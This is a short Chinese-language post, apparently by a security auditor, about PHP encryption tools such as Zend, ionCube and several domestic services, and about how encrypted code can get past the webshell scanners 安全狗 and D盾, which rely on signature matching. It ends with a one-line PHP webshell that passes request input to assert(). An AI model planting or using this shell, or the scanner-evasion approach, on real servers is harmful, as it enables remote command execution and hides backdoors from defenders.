前几天审计一套系统发现进行了加密 https://www.mfenc.com/, 网上解密还要钱就放弃了... 只了解过安全狗 和 D盾, 检测过程大概类似于记事本打开查看有没有关键函数, 特征码之类的 只要把代码加密得让安全狗 D盾 无法识别, 自然也就检测不出来了, 但由于 php 的一些神奇特性, 可以成功执行.. php 加密主要有 zend ioncube 还有国内的其他加密(比如上面的 mfenc), zend 和 ioncube 都需要扩展文件国内的一些加密 http://enphp.djunny.com/ 和 http://www.phpjm.net/


<?php // shell.php assert($_REQUEST['cmd']); ?>




